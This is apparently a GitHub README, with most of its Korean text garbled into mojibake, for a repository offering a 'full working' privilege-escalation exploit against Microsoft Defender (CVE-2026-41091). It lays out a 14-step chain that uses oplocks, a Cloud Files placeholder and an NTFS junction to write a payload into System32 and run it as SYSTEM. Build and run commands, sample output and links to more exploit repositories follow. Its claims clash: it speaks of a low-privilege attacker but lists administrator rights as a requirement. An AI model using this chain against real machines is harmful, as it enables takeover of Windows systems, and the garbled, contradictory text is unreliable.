
CVE-2026-41091-PoC-Exploit Full-PoCv2
CVE-2026-41091 RedSun | Microsoft Defender LPE ์ต์คํ๋ก์. ๋ฎ์ ๊ถํ์ ์ฌ์ฉ์๊ฐ Cloud Files API + NTFS ์ ์ ํธ๋ฆญ์ ํตํด NT AUTHORITY\SYSTEM ๊ถํ์ ํ๋ํฉ๋๋ค ๐ฅ. Defender๊ฐ SYSTEM ๊ถํ์ผ๋ก System32์ ์ ์ฑ ํ์ด๋ก๋๋ฅผ ์ฐ๋๋ก ๊ฐ์ ํฉ๋๋ค. โ ๏ธ ์ค์ ํ๊ฒฝ์์ ํ๋ฐํ ์ ์ฉ ์ค. CVSS 7.8. ํจ์น: Defender Engine 1.1.26040.8. ๐ก๏ธ ๊ต์ก์ฉ PoC ์ ์ฉ์ ๋๋ค.

โ๏ธ CVE-2026-41091 - RedSun (SolarFlare) - Microsoft Defender LPE ์ต์คํ๋ก์
Microsoft Defender ๋งํฌ ์ถ์ ์ทจ์ฝ์ - NT AUTHORITY\SYSTEM์ผ๋ก์ ๋ก์ปฌ ๊ถํ ์์น
์ด ์ทจ์ฝ์ ์ "RedSun" ๐ฏ์ผ๋ก ์๋ ค์ ธ ์์ผ๋ฉฐ, "SolarFlare"๋ ์ ๊ฐ ๋ง๋ ์ต์คํ๋ก์์ ์ด๋ฆ์ ๋๋ค. โ
๐ ๊ฐ์
์ด ์ ์ฅ์๋ Microsoft Defender(Microsoft Malware Protection Engine)์ ์ฌ๊ฐํ ๋ก์ปฌ ๊ถํ ์์น ์ทจ์ฝ์ ์ธ CVE-2026-41091์ ๋ํ ์์ ํ ๋์ํ๋ ๊ฐ๋ ์ฆ๋ช (PoC) ์ต์คํ๋ก์์ ํฌํจํฉ๋๋ค. ์๋ชป๋ ๋งํฌ ํ์ธ(CWE-59)์ ์ ์ฉํ์ฌ, ์ธ์ฆ๋ ๋ฎ์ ๊ถํ์ ๊ณต๊ฒฉ์๊ฐ NT AUTHORITY\SYSTEM ๊ถํ์ ํ๋ํ ์ ์์ต๋๋ค.
"RedSun" ๋๋ **"SolarFlare"**๋ก๋ ์๋ ค์ง ์ด ์ทจ์ฝ์ ์ ๊ณต๊ฒฉ์๊ฐ Cloud Files API(CfAPI)์ NTFS ์ ํฉ ์ง์ ์ ์ฌ์ฉํ์ฌ Microsoft Defender๋ฅผ ์์ฌ SYSTEM ๊ถํ์ผ๋ก ๋ณดํธ๋ ์์คํ ์์น์ ์์์ ํ์ผ์ ์ฐ๊ฒ ํ ์ ์๊ฒ ํฉ๋๋ค.
์ฐธ๊ณ : ์ด ์ ์ฅ์์๋ ๋ ๊ฐ์ง ๋ฒ์ ์ด ํฌํจ๋์ด ์์ต๋๋ค:
basic_poc.cpp- ๋จ์ํ๋ ์๊ณ ๋ฆฌ์ฆ ๋ฐ๋ชจ(๊ต์ก์ฉ)full_poc.cpp- ๋ชจ๋ ๊ธฐ๋ฅ์ ๊ฐ์ถ ์์ ํ ๋์ ์ต์คํ๋ก์
๐ฅ ์ฃผ์ ๊ธฐ๋ฅ
| ๋ฒ์ฃผ | ๊ธฐ๋ฅ |
|---|---|
| ์ ์ฉ | โ
SYSTEM์ผ๋ก์ ๋ก์ปฌ ๊ถํ ์์น โ Cloud Files API(CfAPI) ํตํฉ โ ํด๋ผ์ฐ๋ ์๋ฆฌ ํ์์ ์์ฑ โ NTFS ์ ํฉ ์ง์ ๋ฆฌ๋๋ ์ |
| ๊ธฐ๋ฒ | โ
๋ฐฐ์น Oplock ๋จ์ฉ โ VSS ์ค๋ ์ท ๊ฐ์ง โ EICAR ํธ๋ฆฌ๊ฑฐ โ COM ์๋น์ค ํ์ฑํ |
| ๋์ | โ
Microsoft Defender < 1.1.26040.8 โ Windows 10/11 โ Windows Server 2019/2022 |
| ์ฌ์ฉ์ฑ | โ
์์ธ ๋ก๊น
โ ์ค๋ฅ ์ฒ๋ฆฌ โ ์์ ๋๋ ํฐ๋ฆฌ ์ด๋ฆ โ ์๋ ์ ๋ฆฌ |
๐ฏ ์ทจ์ฝ์ ์ธ๋ถ ์ ๋ณด
| ์์ฑ | ๊ฐ |
|---|---|
| CVE ID | CVE-2026-41091 |
| CVSS ์ ์ | 7.8 (๋์) |
| CVSS ๋ฒกํฐ | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| ๊ณต๊ฒฉ ๋ฒกํฐ | ๋ก์ปฌ |
| ํ์ํ ๊ถํ | ๋ฎ์ |
| ์ฌ์ฉ์ ์ํธ์์ฉ | ์์ |
| ์ํฅ | SYSTEM ์์ค ์ฝ๋ ์คํ |
| CISA KEV | โ ์ (์ค์ ํ๊ฒฝ์์ ํ๋ฐํ ์ ์ฉ๋จ) |
| ํจ์น ์ ๊ณต | Microsoft Malware Protection Engine 1.1.26040.8 |
๐ฆ ์ํฅ๋ฐ๋ ์ ํ
| ์ ํ | ์ํฅ๋ฐ๋ ๋ฒ์ | ์์ ๋ฒ์ |
|---|---|---|
| Microsoft Malware Protection Engine | < 1.1.26040.8 | 1.1.26040.8+ |
| Microsoft Defender Antimalware Platform | < 4.18.26040.7 | 4.18.26040.7+ |
๐ฌ ์ต์คํ๋ก์ ์ฒด์ธ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ SOLARFLARE EXPLOIT CHAIN โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ โ
โ 1. Create Working Directory โ
โ โโ> %TEMP%\SF-XXXX\ โ
โ โ
โ 2. Trigger Defender with EICAR โ
โ โโ> Write reversed EICAR to bait file โ
โ โ
โ 3. Wait for VSS Snapshot โ
โ โโ> Detect Volume Shadow Copy creation โ
โ โ
โ 4. Create First Batch Oplock โ
โ โโ> FSCTL_REQUEST_BATCH_OPLOCK on bait file โ
โ โ
โ 5. Wait for Oplock Break โ
โ โโ> Acquire exclusive access โ
โ โ
โ 6. Rename Directory โ
โ โโ> Move original directory to .tmp โ
โ โ
โ 7. Register Cloud Sync Root โ
โ โโ> CfRegisterSyncRoot with Cloud Files API โ
โ โ
โ 8. Create Cloud Placeholder โ
โ โโ> CfCreatePlaceholders for bait file โ
โ โ
โ 9. Create Second Batch Oplock โ
โ โโ> FSCTL_REQUEST_BATCH_OPLOCK on cloud placeholder โ
โ โ
โ 10. Wait for Second Oplock Break โ
โ โโ> Acquire exclusive access โ
โ โ
โ 11. Rename Cloud Directory โ
โ โโ> Move cloud directory to .cloud.tmp โ
โ โ
โ 12. Create NTFS Junction to System32 โ
โ โโ> Redirect to C:\Windows\System32 โ
โ โ
โ 13. Copy Payload to System32 โ
โ โโ> Copy bait file to System32 as TieringEngineService.exe โ
โ โ
โ 14. Activate Service as SYSTEM โ
โ โโ> CoCreateInstance(StorageTiersManagement) โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฆ ์ค์น
์ฌ์ ์๊ตฌ ์ฌํญ
- Windows 10/11 ๋๋ Windows Server 2019/2022
- C++ ๋๊ตฌ๊ฐ ํฌํจ๋ Visual Studio 2019/2022
- ๊ด๋ฆฌ์ ๊ถํ(์คํ์ ํ์)
๋น๋
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit
# Build using Visual Studio Developer Command Prompt
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# Or build basic version
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
๐ ๏ธ ์ฌ์ฉ ๋ฐฉ๋ฒ
์ ์ฒด ์ต์คํ๋ก์(SYSTEM ๊ถํ ์์น)
full_poc.exe
๊ธฐ๋ณธ ์๊ณ ๋ฆฌ์ฆ ๋ฐ๋ชจ
basic_poc.exe
๐ ์์ ์ถ๋ ฅ
์ ์ฒด ์ต์คํ๋ก์ ์ถ๋ ฅ
CVE-2026-41091 SolarFlare PoC
===============================
by @tc4dy | CVSS 7.8
===============================
[*] SolarFlare exploit started.
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS snapshot detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Renaming cloud directory...
[+] Cloud directory renamed
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\TieringEngineService.exe
[*] Activating Storage Tiers Management service...
[+] Service activated as SYSTEM
[+] SYSTEM access obtained!
๊ธฐ๋ณธ PoC ์ถ๋ ฅ
CVE-2026-41091 Basic PoC
========================================
Algorithm Demonstration Only
========================================
[*] Starting exploit algorithm...
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\Payload.exe
[+] Algorithm demonstration completed!
[i] This is only the basic algorithm.
[i] For full SYSTEM privilege escalation,
[i] use full_poc.cpp with Cloud API and COM activation.
๐ง ๋น๋ ์ง์นจ
Visual Studio ์ฌ์ฉ
- VS 2022์ฉ ๊ฐ๋ฐ์ ๋ช ๋ น ํ๋กฌํํธ๋ฅผ ์ฝ๋๋ค.
- ์ต์คํ๋ก์ ๋๋ ํฐ๋ฆฌ๋ก ์ด๋ํฉ๋๋ค.
- ๋ค์์ ์คํํฉ๋๋ค:
# Full exploit
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# Basic PoC
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
CMake ์ฌ์ฉ
cmake_minimum_required(VERSION 3.10)
project(SolarFlare)
set(CMAKE_CXX_STANDARD 17)
add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)
add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)
โ ๏ธ ์๊ตฌ ์ฌํญ ๋ฐ ์ ํ ์ฌํญ
| ์๊ตฌ ์ฌํญ | ์ธ๋ถ ์ฌํญ |
|---|---|
| OS | Windows 10/11, Server 2019/2022 |
| ๊ถํ | ๊ด๋ฆฌ์(์คํ์ ํ์) |
| Defender | Microsoft Defender๊ฐ ํ์ฑํ๋์ด ์์ด์ผ ํจ |
| ์ธํฐ๋ท | VSS ์ค๋ ์ท ๊ฐ์ง์ ํ์ |
| ํจ์น | ํจ์น๋์ง ์์ ์์คํ ์์๋ง ๋์ |
| ์ํคํ ์ฒ | x64 ์ ์ฉ |
๐ ๊ด๋ จ ์ต์คํ๋ก์
์ ๋ค๋ฅธ ์ต์คํ๋ก์ ์ ์ฅ์๋ ํ์ธํด ๋ณด์ธ์:
- CVE-2026-24061-PoC-Exploit - GNU inetutils-telnetd ์ธ์ฆ ์ฐํ
- CVE-2026-41940-PoC-Exploit - cPanel/WHM ์ธ์ฆ ์ฐํ ์ต์คํ๋ก์
- CVE-2026-0073-PoC-Exploit - Android ADB ๋ฌด์ ๋๋ฒ๊น ์ธ์ฆ ์ฐํ